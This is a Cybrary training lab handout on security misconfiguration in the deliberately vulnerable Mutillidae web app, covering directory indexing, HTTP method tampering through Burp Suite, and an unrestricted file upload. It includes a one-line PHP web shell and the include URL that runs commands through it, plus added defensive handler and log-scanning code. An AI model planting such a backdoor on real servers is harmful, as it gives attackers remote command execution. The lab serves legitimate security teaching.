Module 7 Security Misconfiguration Lab

This document provides instructions for a security misconfiguration lab. It describes 52 steps to log into a virtual machine, access a vulnerable web application, exploit directory listing, change an HTTP request method, and upload a backdoor PHP file to enable remote command execution. The goal is to identify security flaws like directory indexing, parameter tampering and unrestricted file uploads.

Uploaded by

Taha Khan
Copyright: © All Rights Reserved
Module 7 Security Misconfiguration Lab

Description: In this lab, you will identify and exploit a security misconfiguration in a Web application.
Requirements: You will need access to the Cybrary lab environment for this lab.

Step 1: Log into Cybrary.

Step 2: Launch the OWASP Security Misconfiguration lab by searching for it in the catalog and selecting the launch button.
Note: It may take 30-40 seconds for the lab to launch after clicking the button.

Step 3: When the lab opens, you will see a pop-up box. Select the Next button, then Ok to close the pop-up box.
Step 4: You will then be taken to the Kali Linux login screen.
Step 5: Enter a username of student and a password of student to log into the desktop.
Step 6: Next, launch Firefox by clicking on the orange-colored icon near the top-left of the screen. This will launch the Mutillidae page.
Step 7: In the URL bar, type the following and press Enter.
http://mutillidae/mutillidae/includes/

Question 1: Does it look like directory indexing is allowed? ______________________

Step 8: Click the Mutillidae icon at the top-left of the browser to go back to the main Mutillidae page.
Step 9: Next, click on OWASP 2017.
Step 10: Click A6 – Security Misconfiguration.
Step 11: Click Method Tampering (GET for POST).
Step 12: Next, click Poll Question.
Step 13: You will be taken to the User Poll page.
Step 14: Minimize the Firefox window.

Brought to you by: Develop your team with the fastest growing catalog in the cybersecurity industry. Enterprise-grade workforce development management, advanced training features and detailed skill gap and competency analytics.
Step 15: Next, click on the Burp Suite icon on the left-side.
Step 16: A pop-up box will open.
Step 17: Uncheck the “Help improve Burp…” checkbox.
Step 18: Click the “I Accept” button to accept the license agreement.
Step 19: Click the Next button.
Step 20: Next, click the Start Burp button.
Step 21: Next, click the Proxy tab at the top-left.
Step 22: Next, click the “Intercept is on” button to turn off the intercept.
Step 23: Minimize Burp Suite.
Step 24: Click back on Firefox.
Step 25: Right-click the FoxyProxy icon to the right of the URL address bar.
Step 26: Select “Use proxies based on pre-defined patterns and priorities.”
Step 27: Back on the User Poll page, select kismet and enter anything you want in the initials box.
Step 28: Click the Submit Vote button.
Step 29: Minimize Firefox.
Step 30: Click back on Burp Suite.
Step 31: Click on the HTTP History tab at the top-left.
Step 32: Next, right-click on the http://mutillidae entry and select “Send to Repeater” from the menu.
Step 33: Next, click the Repeater tab at the top.
Step 34: We now see the information from the poll. It was sent to the Web application using a GET request.
Step 35: Now, let’s see if the application allows any request method to be used. We will change the method to POST.
Step 36: On the bottom line, change the “kismet” to “telnet.”
Step 37: Next, change the initials you used before.
Step 38: Click the Go button to send your changes to the server.
Step 39: Next, minimize Burp Suite.
Step 40: Click back on Firefox.
Step 41: Select tcpdump and click Submit Vote.

Question 2: Do you see the telnet entry that you submitted via a POST request in Burp Suite?
____________________________________________________________
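The method tampering exercised in Steps 34 to 41 works because the application reads the vote from whatever parameters arrive, whether in the query string or the body, and never checks the HTTP method. The following added example is not part of the Cybrary lab or the Mutillidae code base; it contrasts that permissive pattern with a handler that accepts a vote only from a POST body and only for a known option. The Request shape, the parameter names "choice" and "initials", the allowed choices and the initials length limit are assumptions for illustration.

```python
# Added example, not from the Cybrary lab or the Mutillidae code base.
# Contrasts a vote handler that reads parameters regardless of HTTP method
# (the behaviour the lab abuses) with one that only accepts a POST body.
# Request shape, parameter names, allowed choices and the initials length
# limit are assumptions for illustration.
from dataclasses import dataclass, field
from typing import Dict, Tuple

# Constructed poll options; the lab shows kismet and tcpdump as valid entries.
ALLOWED_CHOICES = frozenset({"kismet", "tcpdump", "nmap"})


@dataclass
class Request:
    method: str
    query: Dict[str, str] = field(default_factory=dict)  # URL parameters
    form: Dict[str, str] = field(default_factory=dict)   # POST body fields


def permissive_vote(req: Request, tally: Dict[str, int]) -> Tuple[int, str]:
    """Misconfigured pattern: merges query string and body (like PHP's
    $_REQUEST) and never checks the method, so a GET carrying the vote in
    the URL is counted exactly like a genuine form submission."""
    params = {**req.query, **req.form}
    choice = params.get("choice")
    if choice is None:
        return 400, "missing choice"
    tally[choice] = tally.get(choice, 0) + 1
    return 200, f"vote recorded for {choice}"


def strict_vote(req: Request, tally: Dict[str, int]) -> Tuple[int, str]:
    """Hardened pattern: a state change is accepted only via POST, only from
    the body, and only for a known option; everything else is refused."""
    if req.method != "POST":
        return 405, "method not allowed"
    choice = req.form.get("choice")          # query-string values are ignored
    if choice is None:
        return 400, "missing choice"
    if choice not in ALLOWED_CHOICES:        # rejects tampered option values
        return 400, "unknown choice"
    if not 1 <= len(req.form.get("initials", "")) <= 3:  # assumed limit
        return 400, "initials must be 1-3 characters"
    tally[choice] = tally.get(choice, 0) + 1
    return 200, f"vote recorded for {choice}"


if __name__ == "__main__":
    tampered = Request("GET", query={"choice": "kismet", "initials": "tk"})
    genuine = Request("POST", form={"choice": "kismet", "initials": "tk"})
    for handler in (permissive_vote, strict_vote):
        tally: Dict[str, int] = {}
        print(handler.__name__, "GET ->", handler(tampered, tally),
              "| POST ->", handler(genuine, tally), "| tally:", tally)
```

The strict handler also refuses a POST whose vote is smuggled in the query string, which is the detail merged-parameter lookups get wrong: the method check alone is not enough if the handler still reads from both sources.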

Step 42: Next, we will create and upload a simple backdoor.


Step 43: Select OWASP 2017 on the left-side.
Step 44: Select A6 – Security Misconfiguration.
Step 45: Select Unrestricted File Upload.
Step 46: Next, click Applications at the top-left of the Kali desktop and click on the Terminal icon to launch the Terminal.
Step 47: In the Terminal window, type the following command and press Enter (use straight quotes; the single quotes stop the shell from expanding $_GET).
echo '<?php system($_GET["cmd"]); ?>' > Desktop/backdoor.php

Step 48: Click back on Firefox.


Step 49: Click the gray-colored folder icon to the right of the Filename box and select the backdoor.php file for upload.
Step 50: Click Open and then click the Upload File button.

Question 3: Do you see the file path that the backdoor.php file has been moved to?
_______________________________________________________________

Step 51: Next, type the following in the URL bar and press Enter.
http://mutillidae/mutillidae/index.php?page=/tmp/backdoor.php&cmd=id
Step 52: Note the “www-data” in the results. This shows that we can run any command by replacing the “cmd” parameter, which means we can potentially gain full control over the Web server operating system.
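Each of the three misconfigurations exercised in this lab leaves a distinct trace in the web server's access log: a 200 response for a bare directory path (Step 7), a state-changing request arriving as a GET with its parameters in the URL (Steps 34 to 41), and a page= value pointing at an absolute path together with a cmd= parameter (Steps 51 and 52). The following added example is not part of the Cybrary lab or the Mutillidae project; it scans constructed Apache-style log lines for those three symptoms. The endpoint path, the parameter names "page", "choice", "initials" and "cmd", and the protected directory list are assumptions.

```python
# Added example, not from the Cybrary lab or the Mutillidae project.
# Scans Apache combined-format access log lines for the three symptoms this
# lab exercises. The log lines are constructed; endpoint and parameter names
# and the protected-directory list are assumptions for illustration.
import re
from typing import Dict, List, Optional
from urllib.parse import parse_qs, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)'
)

# Directories that must never be browsable (assumption for this example).
NO_LISTING_DIRS = frozenset({"/mutillidae/includes/"})
# Endpoints whose handlers change state, with the parameters that identify
# such a request; these must only ever arrive in a POST body (assumption).
STATE_CHANGING = {"/mutillidae/index.php": frozenset({"choice", "initials"})}

# Constructed sample log lines mirroring the lab's traffic.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /mutillidae/includes/ HTTP/1.1" 200 2311',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /mutillidae/index.php?page=poll.php&choice=kismet&initials=tk HTTP/1.1" 200 9876',
    '10.0.0.5 - - [01/Jan/2024:10:00:15 +0000] "POST /mutillidae/index.php?page=poll.php HTTP/1.1" 200 9876',
    '10.0.0.5 - - [01/Jan/2024:10:01:02 +0000] "GET /mutillidae/index.php?page=/tmp/backdoor.php&cmd=id HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2024:10:01:30 +0000] "GET /mutillidae/index.php?page=home.php HTTP/1.1" 200 4000',
    '10.0.0.9 - - [01/Jan/2024:10:02:00 +0000] "GET /mutillidae/includes/ HTTP/1.1" 403 199',
]


def parse_line(line: str) -> Optional[dict]:
    """Split one combined-format line into method, path, status and decoded
    query parameters; returns None for lines that do not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = {k: v[0] for k, v in
                     parse_qs(parts.query, keep_blank_values=True).items()}
    rec["status"] = int(rec["status"])
    return rec


def analyse(rec: dict) -> List[str]:
    """Return the list of symptom labels that apply to one parsed request."""
    findings: List[str] = []
    # 1. Directory listing: a successful GET of a bare protected directory.
    #    A 403 here means indexing is disabled and is not reported.
    if rec["method"] == "GET" and rec["path"] in NO_LISTING_DIRS and rec["status"] == 200:
        findings.append("directory-listing")
    # 2. Method tampering: state-changing parameters carried in a GET URL.
    marker = STATE_CHANGING.get(rec["path"])
    if marker and rec["method"] == "GET" and marker.issubset(rec["params"]):
        findings.append("method-tampering")
    # 3. File inclusion: page= resolving outside the application's own files.
    page = rec["params"].get("page", "")
    if page.startswith("/") or ".." in page or "://" in page:
        findings.append("file-inclusion")
    # 4. A cmd= parameter on an include endpoint is the signature of Step 51.
    if "cmd" in rec["params"]:
        findings.append("command-parameter")
    return findings


def scan(lines: List[str]) -> Dict[int, List[str]]:
    """Map line index to findings, keeping only lines that raised something."""
    results: Dict[int, List[str]] = {}
    for i, line in enumerate(lines):
        rec = parse_line(line)
        if rec is None:
            continue
        hits = analyse(rec)
        if hits:
            results[i] = hits
    return results


if __name__ == "__main__":
    for idx, hits in scan(LOG_LINES).items():
        print(f"line {idx}: {', '.join(hits)}")
```

Only the query string is visible in an access log, so the POST on the third line raises nothing even though it carries the same vote in its body; that is why the hardening has to happen in the handler and the log check can only catch the GET variant. The 403 on the last line shows what the directory-listing check looks like once indexing is disabled.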

 